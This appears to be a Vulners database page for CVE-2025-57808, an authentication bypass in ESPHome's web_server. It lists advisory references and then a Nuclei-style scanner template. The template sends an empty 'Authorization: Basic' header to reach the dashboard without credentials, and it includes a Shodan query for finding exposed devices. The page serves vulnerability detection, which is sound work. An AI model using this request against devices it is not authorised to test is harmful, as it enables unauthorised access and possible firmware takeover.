| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2025-57808 | 1 Sep 202519:20 | – | circl | |
| ESPHome 安全漏洞 | 2 Sep 202500:00 | – | cnnvd | |
| CVE-2025-57808 | 2 Sep 202500:26 | – | cve | |
| CVE-2025-57808 ESP-IDF web_server basic auth bypass using empty or incomplete Authorization header | 2 Sep 202500:26 | – | cvelist | |
| EUVD-2025-26385 | 3 Oct 202520:07 | – | euvd | |
| ESP-IDF web_server basic auth bypass using empty or incomplete Authorization header | 2 Sep 202516:46 | – | github | |
| CVE-2025-57808 | 2 Sep 202501:15 | – | nvd | |
| CVE-2025-57808 ESP-IDF web_server basic auth bypass using empty or incomplete Authorization header | 2 Sep 202500:26 | – | osv | |
| GHSA-MXH2-CCGJ-8635 ESP-IDF web_server basic auth bypass using empty or incomplete Authorization header | 2 Sep 202516:46 | – | osv | |
| PYSEC-2026-1330 ESP-IDF web_server basic auth bypass using empty or incomplete Authorization header | 7 Jul 202616:03 | – | osv |
id: CVE-2025-57808
info:
name: ESPHome - Authentication Bypass
author: sean-kim
severity: high
description: |
ESPHome 2025.8.0 contains an authentication bypass caused by improper validation of base64-encoded Authorization values in the web_server component, letting attackers access functionality without valid credentials, exploit requires crafted Authorization header.
impact: |
Attackers can bypass authentication to access web server functions, including OTA updates, potentially compromising device control.
remediation: |
Upgrade to version 2025.8.1 or later.
reference:
- https://cybersecuritynews.com/esphome-web-server-authentication-bypass/
- https://github.com/esphome/esphome/security/advisories/GHSA-mxh2-ccgj-8635
- https://esphome.io/components/web_server/
metadata:
verified: true
max-request: 1
shodan-query: http.title:"ESPHome"
tags: cve,cve2025,auth-bypass,esphome,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code == 401'
internal: true
- method: GET
path:
- "{{BaseURL}}/"
headers:
Authorization: Basic
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Dashboard - ESPHome")'
condition: and
# digest: 4b0a00483046022100f468feecaa85800515ac35dda5f3a71d029273757f1dbb45401f78866e956cd2022100be998886f966fa215b9730597d7b24f67deecda75f4ac53cad70dcdd2935cdea:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation